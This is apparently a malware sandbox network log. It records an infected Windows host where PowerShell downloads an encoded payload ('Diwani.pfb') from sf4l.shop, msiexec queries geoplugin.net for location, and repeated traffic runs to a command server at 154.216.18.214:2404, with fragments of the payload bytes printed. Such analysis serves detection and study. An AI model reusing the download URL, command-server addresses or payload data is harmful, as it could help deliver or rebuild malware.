                                                                                        Oct 21, 2024 17:06:01.601511002 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.601521969 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.601533890 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.601536036 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.601541042 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.601548910 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.601564884 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.601566076 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.601577044 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.601588964 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.601589918 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.601600885 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.601608992 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.601613998 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.601624966 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.601650953 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.602345943 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.602360010 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.602372885 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.602404118 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619210958 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619239092 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619256020 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619260073 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619271994 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619286060 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619297028 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619304895 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619319916 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619338989 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619343996 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619355917 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619364977 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619378090 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619383097 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619390011 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619395018 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619402885 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619446993 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619479895 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619493961 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619505882 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619513988 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619518042 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619530916 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619544029 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619553089 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619563103 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619570017 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619580030 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619601965 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619641066 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619653940 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619673014 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619774103 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619786024 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619805098 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619807959 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619820118 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619832039 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619837999 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619837999 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619860888 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619865894 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619874954 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619887114 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619894028 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619910002 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619920969 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619929075 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619945049 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619952917 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.619962931 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619977951 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619996071 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.619997978 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620009899 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620023012 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620028973 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620038033 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620050907 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620057106 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620065928 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620084047 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620085001 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620099068 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620112896 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620117903 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620146036 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620150089 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620163918 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620178938 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620197058 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620209932 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620222092 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620232105 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620244980 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620244980 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620259047 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620268106 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620280027 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620290995 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620294094 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620309114 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620321989 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620332003 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620354891 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620404959 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620417118 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620426893 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620440006 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620448112 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620451927 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620472908 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620884895 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620898008 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620909929 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620919943 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620920897 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620934963 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620944977 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620945930 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620958090 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620964050 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620971918 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.620989084 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.620992899 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.621007919 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.621018887 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.621026993 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.621031046 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.621045113 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.621047974 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.621061087 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.621073008 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.621083975 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.621089935 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.621098042 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.621109009 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.621109962 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.621121883 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.621134043 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.621134043 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.621159077 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.621268988 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.621279955 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.621304989 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.663331985 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.668500900 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:01.834830999 CEST8049972178.237.33.50192.168.2.7
                                                                                        Oct 21, 2024 17:06:01.834918976 CEST4997280192.168.2.7178.237.33.50
                                                                                        Oct 21, 2024 17:06:07.954490900 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:07.959908009 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.960019112 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.960050106 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:07.960067034 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.960113049 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:07.960146904 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.960158110 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.960175037 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.960230112 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.960311890 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.960321903 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.960330963 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.965831041 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.965847015 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.965866089 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.965874910 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.965884924 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.965917110 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:07.965928078 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:08.219729900 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:08.225577116 CEST240449971154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:08.225620985 CEST499712404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:17.762248993 CEST240449960154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:17.764933109 CEST499602404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:17.770385981 CEST240449960154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:47.796410084 CEST240449960154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:06:47.799300909 CEST499602404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:06:47.805013895 CEST240449960154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:07:17.809309006 CEST240449960154.216.18.214192.168.2.7
                                                                                        Oct 21, 2024 17:07:17.811511040 CEST499602404192.168.2.7154.216.18.214
                                                                                        Oct 21, 2024 17:07:17.817029953 CEST240449960154.216.18.214192.168.2.7
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 21, 2024 17:05:25.185508966 CEST5151053192.168.2.71.1.1.1
                                                                                        Oct 21, 2024 17:05:25.318968058 CEST53515101.1.1.1192.168.2.7
                                                                                        Oct 21, 2024 17:06:00.146655083 CEST6190753192.168.2.71.1.1.1
                                                                                        Oct 21, 2024 17:06:00.156414986 CEST53619071.1.1.1192.168.2.7
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Oct 21, 2024 17:05:25.185508966 CEST192.168.2.71.1.1.10xadf3Standard query (0)sf4l.shopA (IP address)IN (0x0001)false
                                                                                        Oct 21, 2024 17:06:00.146655083 CEST192.168.2.71.1.1.10xf965Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Oct 21, 2024 17:05:25.318968058 CEST1.1.1.1192.168.2.70xadf3No error (0)sf4l.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Oct 21, 2024 17:05:25.318968058 CEST1.1.1.1192.168.2.70xadf3No error (0)sf4l.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Oct 21, 2024 17:06:00.156414986 CEST1.1.1.1192.168.2.70xf965No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                        • sf4l.shop
                                                                                        • geoplugin.net
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.749972178.237.33.50808140C:\Windows\SysWOW64\msiexec.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 21, 2024 17:06:00.163453102 CEST71OUTGET /json.gp HTTP/1.1
                                                                                        Host: geoplugin.net
                                                                                        Cache-Control: no-cache
                                                                                        Oct 21, 2024 17:06:00.752000093 CEST1168INHTTP/1.1 200 OK
                                                                                        date: Mon, 21 Oct 2024 15:06:00 GMT
                                                                                        server: Apache
                                                                                        content-length: 960
                                                                                        content-type: application/json; charset=utf-8
                                                                                        cache-control: public, max-age=300
                                                                                        access-control-allow-origin: *
                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 32 31 36 2e 35 32 2e 31 38 33 2e 31 35 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                                                        Data Ascii: { "geoplugin_request":"216.52.183.150", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7157", "geoplugin_longitude":"-74", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.749746188.114.97.34437540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-21 15:05:25 UTC172OUTGET /zWAbmrmP/Diwani.pfb HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                        Host: sf4l.shop
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-21 15:05:26 UTC760INHTTP/1.1 200 OK
                                                                                        Date: Mon, 21 Oct 2024 15:05:26 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sORWeGLIJsRDqF%2BG9FWGeVm7%2Fe%2BpHGpGnarUbge39uIOLZuQqVh0vh5ZwGV2kp5LT%2F15fqRvB4tRdbwPfgjBV8tS4XInhYNS0o3ExpL8%2BMtf8TQ2yyPrCo%2FqsCA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d6225507d7f8c1b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1823&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=786&delivery_rate=1467815&cwnd=251&unsent_bytes=0&cid=262a1b030cba092d&ts=293&x=0"
                                                                                        2024-10-21 15:05:26 UTC609INData Raw: 33 31 65 61 0d 0a 36 77 4c 4d 71 65 73 43 6f 78 43 37 61 57 63 50 41 4f 73 43 50 39 76 72 41 69 56 2b 41 31 77 6b 42 4f 73 43 72 63 35 78 41 5a 75 35 79 55 31 47 6e 75 73 43 7a 73 50 72 41 6b 52 74 67 66 48 73 69 56 49 51 63 51 47 62 36 77 4c 33 2b 6f 48 70 4a 63 51 55 6a 75 73 43 61 6e 5a 78 41 5a 74 78 41 5a 74 78 41 5a 75 36 35 63 54 68 56 4f 73 43 75 4b 2f 72 41 6e 59 6e 36 77 4a 48 68 6e 45 42 6d 7a 48 4b 63 51 47 62 63 51 47 62 69 52 51 4c 63 51 47 62 36 77 4b 36 55 4e 48 69 63 51 47 62 36 77 4c 45 75 49 50 42 42 48 45 42 6d 33 45 42 6d 34 48 35 56 79 75 66 41 48 7a 4e 36 77 4a 78 54 6e 45 42 6d 34 74 45 4a 41 52 78 41 5a 76 72 41 71 6b 4c 69 63 50 72 41 6b 75 33 63 51 47 62 67 63 4f 5a 45 6a 51 41 36 77 49 54 4a 58 45 42 6d 37 72 77 4d 4a 6d 76 36
                                                                                        Data Ascii: 31ea6wLMqesCoxC7aWcPAOsCP9vrAiV+A1wkBOsCrc5xAZu5yU1GnusCzsPrAkRtgfHsiVIQcQGb6wL3+oHpJcQUjusCanZxAZtxAZtxAZu65cThVOsCuK/rAnYn6wJHhnEBmzHKcQGbcQGbiRQLcQGb6wK6UNHicQGb6wLEuIPBBHEBm3EBm4H5VyufAHzN6wJxTnEBm4tEJARxAZvrAqkLicPrAku3cQGbgcOZEjQA6wITJXEBm7rwMJmv6
                                                                                        2024-10-21 15:05:26 UTC1369INData Raw: 62 55 33 45 42 6d 2b 73 43 36 45 4e 71 2f 2b 73 43 33 61 48 72 41 6a 54 68 67 38 49 46 63 51 47 62 63 51 47 62 4d 66 5a 78 41 5a 76 72 41 6e 55 48 4d 63 6e 72 41 67 4e 34 36 77 49 77 38 59 73 61 63 51 47 62 36 77 4c 4f 57 6b 48 72 41 6d 79 4a 36 77 4a 7a 4d 54 6b 63 43 6e 58 79 63 51 47 62 63 51 47 62 52 6e 45 42 6d 33 45 42 6d 34 42 38 43 76 75 34 64 64 35 78 41 5a 74 78 41 5a 75 4c 52 41 72 38 36 77 4a 67 6b 6e 45 42 6d 79 6e 77 36 77 4b 32 5a 48 45 42 6d 2f 2f 53 36 77 4c 32 71 65 73 43 51 49 4b 36 51 4c 73 45 41 48 45 42 6d 33 45 42 6d 7a 48 41 36 77 4b 73 2f 4f 73 43 4f 38 47 4c 66 43 51 4d 63 51 47 62 36 77 4a 63 6c 34 45 30 42 2b 6e 64 47 2f 72 72 41 73 4d 38 36 77 4a 53 63 34 50 41 42 4f 73 43 2b 35 5a 78 41 5a 73 35 30 48 58 6a 36 77 49 54 7a 75
                                                                                        Data Ascii: bU3EBm+sC6ENq/+sC3aHrAjThg8IFcQGbcQGbMfZxAZvrAnUHMcnrAgN46wIw8YsacQGb6wLOWkHrAmyJ6wJzMTkcCnXycQGbcQGbRnEBm3EBm4B8Cvu4dd5xAZtxAZuLRAr86wJgknEBmynw6wK2ZHEBm//S6wL2qesCQIK6QLsEAHEBm3EBmzHA6wKs/OsCO8GLfCQMcQGb6wJcl4E0B+ndG/rrAsM86wJSc4PABOsC+5ZxAZs50HXj6wITzu
                                                                                        2024-10-21 15:05:26 UTC1369INData Raw: 53 37 61 71 74 38 6f 4a 45 33 67 54 74 79 55 46 66 6a 53 56 77 72 6d 6d 48 50 33 49 74 48 74 6c 78 31 2b 65 7a 63 42 46 41 74 52 55 62 4b 4c 6e 53 74 31 47 77 31 78 53 45 6f 75 68 41 47 57 53 6d 72 2b 7a 6a 36 45 6f 75 7a 30 75 65 77 4e 73 66 76 76 4f 58 4e 6b 6c 2b 76 7a 71 71 33 56 55 2b 76 76 34 51 4a 38 35 6c 74 4a 49 31 74 43 37 47 59 64 63 46 42 54 74 37 69 55 46 4a 38 2b 55 4c 66 65 54 50 6a 77 67 46 39 50 6e 64 5a 64 59 30 4b 4f 50 58 4f 45 70 56 59 65 53 64 78 66 63 47 2f 6f 6c 58 42 70 34 53 65 58 61 44 36 48 75 72 42 6a 66 6f 79 7a 74 53 6d 38 59 63 65 2f 49 4e 35 4c 51 31 4b 4c 36 45 78 39 4d 65 77 41 4c 67 65 6e 4f 58 4f 72 58 2b 49 53 7a 39 65 6e 4e 46 66 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 73 6e
                                                                                        Data Ascii: S7aqt8oJE3gTtyUFfjSVwrmmHP3ItHtlx1+ezcBFAtRUbKLnSt1Gw1xSEouhAGWSmr+zj6Eouz0uewNsfvvOXNkl+vzqq3VU+vv4QJ85ltJI1tC7GYdcFBTt7iUFJ8+ULfeTPjwgF9PndZdY0KOPXOEpVYeSdxfcG/olXBp4SeXaD6HurBjfoyztSm8Yce/IN5LQ1KL6Ex9MewALgenOXOrX+ISz9enNFfrp3Rv66d0b+undG/rp3Rv66d0b+sn
                                                                                        2024-10-21 15:05:26 UTC1369INData Raw: 64 30 67 57 71 52 75 4d 32 77 4c 5a 47 6b 70 36 78 30 74 47 52 78 63 39 61 45 6b 48 6d 37 31 4c 75 7a 31 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 33 71 6e 65 58 76 6c 69 72 37 79 65 67 71 32 73 59 6d 6a 4e 2b 2b 6e 64 38 35 35 75 32 52 74 7a 62 50 55 61 2b 75 6d 50 6f 57 35 47 41 75 64 37 47 79 43 4a 35 51 35 63 36 54 6a 72 48 51 42 7a 36 37 2f 37 36 71 35 6b 71 73 47 6f 35 65 4a 48 45 76 63 51 75 35 5a 6e 38 6f 78 62 30 68 64 47 30 4b 30 74 6a 7a 4c 61 34 35 41 55 55 53 39 33 64 55 6e 39 6c 6d 4b 48 46 50 76 32 37 78 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 38 69 78 43 4f 47 4d 51 37 72 53 63 61 54 42 46 50 76 79 52 78 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36
